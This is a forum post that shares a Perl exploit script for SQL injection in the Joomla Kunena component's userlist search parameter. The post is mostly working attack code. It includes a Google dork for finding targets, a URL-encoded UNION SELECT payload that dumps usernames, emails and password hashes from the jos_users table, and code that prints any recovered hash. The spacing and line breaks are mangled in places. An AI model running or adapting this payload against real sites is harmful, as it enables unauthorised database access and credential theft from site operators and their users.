Joomla Kunena Component (index.php, search parameter) SQL Injection 10-27-2012, 02:30 PM
#1
Code:
#!/usr/bin/perl
#Exploittitle:JoomlaComponent
com_kunenaSQLInjectionexploit
#GoogleDork:inurl:index.php?
option=com_kunena&
#ExploitAuthor:D35m0nd142
#Screenshot:http://imageshack.us/
f/155/comkunena2.png/
#VendorHomePage:http://
www.joomla.org/
#SpecialthankstoTaurusomar
system("clear");
print
"*********************************************
\n";
print"*JoomlaComponentcom_kunena
SQLInjection*\n";
print"* Codedby
D35m0nd142 *\n";
print
"*********************************************
\n";
sleep1;
useLWP::UserAgent;
print"Enterthetarget-->";
chomp(my$target=<STDIN>);
$code="%25%27%20and%201=2%29%20union
%20select%201,%20concat
%280x3a,username,0x3a,email,0x3a,0x3a,activation
%29,concat
%280x3a,username,0x3a,email,0x3a,password,0x3a,activation
%29,%27Super%20Administrator%27,
%27email%27,
%272009-11-26%2022:09:28%27,
%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from
%20jos_users--%20;";
$agent=LWP::UserAgent->new()or
die"[!]Errorwhileprocessing";
$agent->agent('Mozilla/5.0(WindowsNT
6.1;WOW64;rv:7.0.1)Gecko/20100101
Firefox/7.0.12011');
$host=$target."/index.php?
option=com_kunena&func=userlist&search=".
$code;
$ok=$agent->request(HTTP::Request-
>new(GET=>$host));
$ok1=$ok->content;if($ok1=~/
([0-9a-fA-F]{32})/){
print"[+]Passwordfound-->$1\n
$2\n";
sleep1;
}
else
{
print"Passwordnotfound\n";
}![[Image: deceptionorangeoverlay.png]](http://img7.imageshack.us/img7/812/deceptionorangeoverlay.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)